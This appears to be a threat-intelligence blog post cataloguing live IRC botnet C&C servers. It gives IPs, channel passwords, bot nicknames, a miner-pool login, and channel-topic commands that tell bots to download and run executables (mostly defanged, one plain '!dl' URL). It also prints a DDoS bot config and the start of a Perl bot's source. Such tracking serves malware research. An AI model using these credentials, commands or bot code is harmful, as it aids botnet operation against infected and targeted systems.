Author: Pig

64.120.239.219(ngrBot hosted in United States Scranton Network Operations Center Inc.)

Uncategorized

C&C Server: 64.120.239.219:1887 Server Password: Username: fbidqck Nickname: n{DE|XPa}fbidqck Channel: #pool (Password: leonis)  Channeltopic: :~pu hxxp://www.sendspace.com/pro/dl/3qtgh8 da611193656522f073e0e64c8a65969a -r Downloads this file wich is another ngrbotnet:hxxp://69.31.136.33/dlpro/cee0ddc1c1f7eb6a248759eaf0f4cc45/50d9e2b9/3qtgh8/bonbin.exe sample was found by our turkish kebap friend aLiSs hosting infos: http://whois.domaintools.com/64.120.239.219

www.btcminers.biz(Bit Coin Miner hosted in Russian Federation Saint Petersburg Selectel Ltd.)

Uncategorized

Resolved : [www.btcminers.biz] To [31.186.102.189] Resolved : [www.btcminers.biz] To [31.186.102.182] http://www.btcminers.biz:789/ -u m2n3r_A -p refghvytre  | POST / HTTP/1.1.  | .Authorization:  | Basic bTJuM3JfQT A | pyZWZnaHZ5dHJl..  | Content-Length:  | 43..User-Agent:  | Ufasoft bitcoin-  | miner/0.20 (Wind  | ows NT XP 5.1.26  | 00 Service Pack  | 2) ..Host: local  | host:789..Cache-  | Control: no-cachRead more...

64.56.64.29(ngr botnet hosted in United States Los Angeles Perfect International In)

Uncategorized

server: 64.56.64.29:1887 server: 174.37.172.71:1887server: 184.172.60.181:1887server: 5.153.6.203 TCP:1887Server Password:Username: hxfyijcNickname: n{DE|XPa}hxfyijcChannel: #pool (Password: leonis) Cannel:#r3Channeltopic: :~pu hxxp://hotfile.com/dl/184384511/5b0f4b2/omaigato.exe 765cce9dee5448f58d9e798d91dbf809 ~s -o ~s find more infos about the owner and domains searching for 1887 in this blog downloaded samples: hxxp://199.7.177.244/dl/184384734/6e6cd1d/all.exe==>downloads these links:hxxp://80.86.83.93/index (2musicaonline.com)hxxp://80.86.83.93/Emo-Screamo/ (2musicaonline.com) hxxp://hotfile.com/dl/184299133/b91a140/8346g527rg239gth34t24t.html thanks to aLiSs the turkish kebap for submiting samples hosting infos: http://whois.domaintools.com/64.56.64.29

Master Poko Perlbot vS PiF(linux bots hosted in France Paris Gandi Sas)

Uncategorized

var $config = array("server"=>"92.243.21.133", "port"=>"6667", "pass"=>"", "prefix"=>"soldiers", "maxrand"=>"5", "chan"=>"#ddos2", "chan2"=>"#ddos2", "key"=>"ddos", "modes"=>"+p", "password"=>"dor", "trigger"=>".", "hostauth"=>"*" Local users: Current Local Users: 188 Max: 190 Global users:Current Global Users: 188 Max: 190 around 130 linux bots in #unix Master Poko Perlbot vS PiF: #!/usr/bin/perl # # Master Poko Perlbot vS PiF # my @mast3rs = ("Norman","Norman-"); myRead more...

irc.infctd.biz(irc botnet hosted in Sweden Stockholm Portlane Networks Ab)

Uncategorized

Resolved : [irc.infctd.biz] To [46.246.93.77] server: irc.infctd.biz port:6667 NICK [skank]5926101 USER nxmnrwy 0 0 :[skank]5926101 USERHOST [skank]5926101 MODE [skank]5926101 -x JOIN #deneme101010 Now talking in #deneme101010Topic On: [ #deneme101010 ] [ !dl http://mgtrading.org/ddos.exe c:/ddos.exe 1 ]Topic By: [ voLwy ] hosting infos: http://whois.domaintools.com/46.246.93.77